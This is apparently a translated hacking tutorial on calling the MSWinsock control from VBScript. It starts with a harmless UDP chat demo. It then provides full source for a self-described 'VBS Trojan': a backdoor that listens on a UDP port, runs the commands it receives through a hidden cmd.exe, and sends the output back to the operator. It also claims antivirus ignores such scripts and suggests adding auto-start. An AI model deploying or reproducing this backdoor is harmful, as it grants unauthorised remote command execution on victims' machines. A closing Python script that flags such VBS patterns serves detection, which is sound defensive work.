VBS + MSWinsock

Source: Internet
Author: User

About a year ago, VBS script viruses went viral again, and a large group of them were prevalent on the Internet. At that time, almost all of them used FSO and MAPI as the virus transmission engine. So I thought: can VBS access the network? If it could also connect to ports, that would be amazing. Since then, I have tried my best to find information about VBS networking. Unfortunately, for a long time I got no results; only after the College Entrance Examination ended a month ago could I calm down and make some progress.
Now let's analyze how VBS works. The full name of VBS is "Visual Basic Scripts". Because VBS is an object-oriented scripting language split off from Visual Basic, its syntax is similar to that of Visual Basic, and it also relies on objects to implement more advanced functions. The only difference is that VBS is interpreted by wscript.exe or cscript.exe, so it does not need to be compiled and runs directly. This is one of the specialties of VBS script as a hacker tool: general anti-virus software will not be interested in VBS. Because VBS is an object-oriented scripting language, many of Microsoft's ActiveX components can be referenced with CreateObject("ObjectName"); this may be a program interface left by Microsoft!
Friends who have used VB to write network programs know that there are roughly two kinds of network programs written with VB: one calls Windows API functions, and the other uses the Winsock control that comes with VB, that is, "MSWinsock.ocx". Because the API functions of the former are complicated, many friends prefer the Winsock control. I wonder if you have noticed that the Winsock control is actually one of the ActiveX components I mentioned earlier. It provides a convenient way to access TCP and UDP network services. To write client or server applications, you do not have to understand the details of TCP or call the low-level Winsock APIs. By setting the control's properties and calling its methods, you can easily connect to a remote machine and exchange data in both directions. With such a network access engine available, why use it only in VB?
The usage of the Winsock control in VBS is basically the same as in VB. However, in VBS an ActiveX control is not visible as it is in VB; to reference it in VBS, the object of course has to be created first. It is created the same way as an FSO object. Create a new text file and write into it:
--------------------------------------------------
Set Sock = CreateObject("MSWinsock.Winsock")
Sock.AboutBox
--------------------------------------------------
Save it as *.vbs and run it to view the Winsock control registered in your system.
Don't rush; I will discuss it in detail below. Now that the object has been created successfully, use it as in VB. A Winsock object created in VBS cannot have its parameters set through a graphical interface as in VB; you have to set them step by step in code. The protocol used by the Winsock control is set through "Protocol", for example sock.Protocol = 0 or sock.Protocol = 1. Note: when the value of "Protocol" is 0, the protocol is TCP; when the value is 1, it is UDP.
Let me first introduce the basic methods and events of the Winsock control, for reference:
LocalHostName // obtain the local host name
LocalIP // obtain the IP address of the local host
SocketHandle // obtain the handle of the created socket
RemotePort // set or obtain the remote port
LocalPort // set or obtain the local port
State // return the status of the created socket (codes as follows) {
0 closed (the default value)
1 open
2 listening
3 connection pending
4 resolving host
5 host resolved
6 connecting
7 connected
8 the peer is closing the connection
9 error }
BytesReceived // return the amount of data received (currently in the receive buffer)
Connect (RemoteHost, RemotePort) // establish a remote connection; RemoteHost is the remote host's IP address and RemotePort is the remote host's port
Listen // put the socket into listening mode
SendData/GetData // send or receive data
Close // close the object
Bind (LocalPort, LocalIP) // bind the local port
That covers the basics. Next I will test talking to a remote host (over UDP). Below is a VBS file you can try; the code is as follows (file sock-udp.vbs):
----------------------------------------
Dim revdata
Dim sendata
' Create a Winsock object
Set sock = CreateObject("MSWinsock.Winsock")
' Use the UDP protocol
sock.Protocol = 1
' Establish a connection
sock.Connect "127.0.0.1", 1234
' Define the data to be sent
sendata = "Hello !!! " & Chr(13)
' Send the data
sock.SendData sendata
Do
    ' If data has arrived in response, display it
    If sock.BytesReceived > 0 Then
        ' Specify the type of the data to receive (the data types include vbByte, vbInteger, vbLong, vbSingle,
        ' vbDouble, vbCurrency, vbDate, vbBoolean, vbError, vbString, vbArray + vbByte).
        ' The type must match the data being received, otherwise a bunch of garbled characters will be received.
        sock.GetData revdata, vbString
        sendata = InputBox(revdata, "RecviedData", "Enter your message")
        sock.SendData sendata & Chr(13)
        ' Terminate the VBS process when the string "exit" is received
        If InStr(revdata, "exit") Then Exit Do
    End If
Loop
' Close the object
sock.Close
------------------------------------------
Then use "nc -u -l -p 1234" to listen on local UDP port 1234, and run the VBS file you just wrote! My NC is responding.
The "MicroSoft (r) Windows Based Script Host" in it is our main VBS process. In NC, we can send messages and chat. How about that? A simple UDP client/server is now complete. Next, let me write another example of how to use it. Since it can access the network, it can certainly be used as a VBS Trojan! The editors won't disagree! Haha, let's go!
--------------------------
Dim revdata
Set sock = createobject ("MSWinsock. Winsock ")
Set SC = createobject ("WScript. Shell ")
Set fso = CreateObject ("Scripting. FileSystemObject ")

Sock. Protocol = 1 // This is the identifier of the UDP Protocol.
Sock. bind 1234 // bind the local UDP port

Do
If sock. BytesReceived> 0 then
Sock. getdata revdata, vbString
If instr (revdata, "exit")> 0 then
Exit do
Else
On error resume next
Tempfile = "C: \" & fso. GetTempName
'Cmd = right (revdata, len (revdata)-4)
Cmd = left (revdata, len (revdata)-3)
// Use the output bound to cmd
Call SC. Run ("cmd.exe/c" & cmd & ">" & tempfile, 0, True)
Set txf = fso. OpenTextFile (tempfile, 1, false, 0)
// Read the output file into the memory and send it to the client using SendData
Sock. senddata txf. readall & vbcrlf
Txf. close
Call fso. DeleteFile (TempFile, True)
End if
// Hey, here is my copyright
Sock. senddata "-- End --" & vbcrlf & "ForHelp exit: end | run: <RunFileName>" & vbcrlf & "Maked by Attrib Data: 2004.7.28" & vbcrlf
End if
Loop
Sock. senddata "Connection closed! "& Vbcrlf
Sock. close
Sock = nothings
-------------------
At this point, the basic architecture of the code is complete. If you want to build an all-powerful Trojan, you can add things such as automatic startup to the code. Because the VBS program has no error protection, some incorrect operations may crash it. If you are interested, try it on your own. This VBS backdoor is first run on the server, and then you connect to it with NC. Because the UDP protocol is used, the NC command line is "nc -u IP Port"; remember to add the "-u" parameter. It is used like WinShell. The following is a test on my machine.

As for how to write TCP, the principle is similar to UDP. I will not write more here. You can study it on your own.
If you have any good methods, you can study them with me. Thank you for watching.
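Seen from the defender's side, the scripts above have a recognizable static shape: a `CreateObject` call for the Winsock control, optionally followed by `Bind`/`Listen`, and in the backdoor case a `WScript.Shell` object whose `Run` method is called. The triage sketch below is an added example, not code from the original article; the finding names and the sample scripts are constructed for illustration, and it tolerates stray whitespace inside the ProgID and ignores commented-out lines.

```python
import re

# ProgIDs the article's scripts create, mapped to the capability each one grants.
CAPABILITIES = {"mswinsock.winsock": "network", "wscript.shell": "exec"}
CREATE_RE = re.compile(r'createobject\s*\(\s*"([^"]*)"', re.I)
MEMBER_RE = re.compile(r'\.\s*(bind|listen|connect|run)\b', re.I)

def strip_comment(line):
    """Remove a VBScript comment (Rem or '), ignoring apostrophes inside strings."""
    if re.match(r"\s*rem\b", line, re.I):
        return ""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string
        elif ch == "'" and not in_string:
            return line[:i]
    return line

def triage(source):
    progids, members = set(), set()
    for line in source.splitlines():
        code = strip_comment(line)
        for m in CREATE_RE.finditer(code):
            # Drop whitespace so "MSWinsock. Winsock " still matches.
            progids.add(re.sub(r"\s+", "", m.group(1)).lower())
        members.update(m.group(1).lower() for m in MEMBER_RE.finditer(code))
    caps = {CAPABILITIES[p] for p in progids if p in CAPABILITIES}
    findings = []
    if "network" in caps:
        findings.append("socket-from-script")
    if "network" in caps and members & {"bind", "listen"}:
        findings.append("listening-socket")
    if {"network", "exec"} <= caps and "run" in members:
        findings.append("network-to-shell")
    return findings

# Constructed samples (not from the page) with the same shape as the article's scripts.
SAMPLE_LISTENER = '''Set sock = CreateObject ("MSWinsock. Winsock ")
Set sh = CreateObject("WScript.Shell")
sock.Protocol = 1
sock.Bind 1234
sh.Run "cmd.exe /c ...", 0, True'''
SAMPLE_CLIENT = '''Set sock = CreateObject("MSWinsock.Winsock")
sock.Connect "127.0.0.1", 1234'''
SAMPLE_BENIGN = """' Set sock = CreateObject("MSWinsock.Winsock")
Set fso = CreateObject("Scripting.FileSystemObject")"""

if __name__ == "__main__":
    print([triage(s) for s in (SAMPLE_LISTENER, SAMPLE_CLIENT, SAMPLE_BENIGN)])
```

This is a string-level heuristic: a ProgID assembled at run time by concatenation will not match, so pair it with process telemetry showing wscript.exe or cscript.exe opening sockets.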
